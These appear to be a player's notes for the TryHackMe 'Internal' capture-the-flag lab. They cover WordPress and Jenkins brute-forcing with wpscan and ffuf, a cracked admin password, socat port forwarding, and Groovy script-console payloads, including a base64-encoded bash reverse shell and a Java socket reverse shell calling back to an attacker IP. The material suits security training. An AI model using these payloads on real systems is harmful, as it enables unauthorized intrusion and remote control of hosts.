internal

https://tryhackme.com/room/internal

http://internal.thm/phpmyadmin/ http://internal.thm/blog/wp-login.php

- Wordpress 5.4.2 Users - http://internal.thm/blog/index.php/wp-json/wp/v2/users/ wpscan --url http://internal.thm/blog/ -o wps.txt -e vp,vt,u1-50 wpscan --url http://internal.thm/blog/ -U admin -P ../rockyou.txt -t 50 --password-attack wp-login

admin:my2boys

python3 xmlrpc-bruteforcer.py -u admin -w ../rockyou.txt -x http://internal.thm/blog/xmlrpc.php

- phpmyadmin v4.6.6 defaults creds - root:<blank>

william:[redacted]

aubreanna:[redacted]

â€ĸ inside a docker container? cat /proc/self/cgroup

jenkins 2.250

./socat TCP-LISTEN:9700,fork TCP:172.17.0.2:8080

ffuf -X POST -request rr -u http://10.10.47.108:9700/j_acegi_security_check -w ../userlist.txt:UN -w ../passwordlist.txt:PW -fr loginError -s

ffuf -X POST -u http://10.10.47.108:9700/j_acegi_security_check -d "j_username=admin&j_password=FUZZ&from=%2F&Submit=Sign+in" -w pwdl -fr loginError -H 'Content-Type: application/x-www-form-urlencoded''

â€ĸ Groovy script RCE in Jenkins - <url>/script #1 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '<cmd>'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

#2 def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNy4xNjkvNzkwMiAwPiYxJwo=}|{base64,-d}|{bash,-i}'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"

#3 cmd.exe for windows String host="10.17.14.169"; int port=7902; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

root:[redacted]

http://10.10.47.108:9700/j_acegi_security_check j_username=test&j_password=test&from=%2F&Submit=Sign+in

========================================= PoC: - xmlrpc system.mutlicall doesn't work - login as admin into wp - wp-login.php bruteforce - upload malicious plugin for RCE - the plugin directory isn't writable - theme directory is writable, uploaded shell - mapped jenkins docker ip:port to machine ip:port using socat - jenkins running in a docker container - lets try bf'ing jenkins login - injected reverse shell script in groovy

PreviousFortressNextAnti-Forensic Techniques

Last updated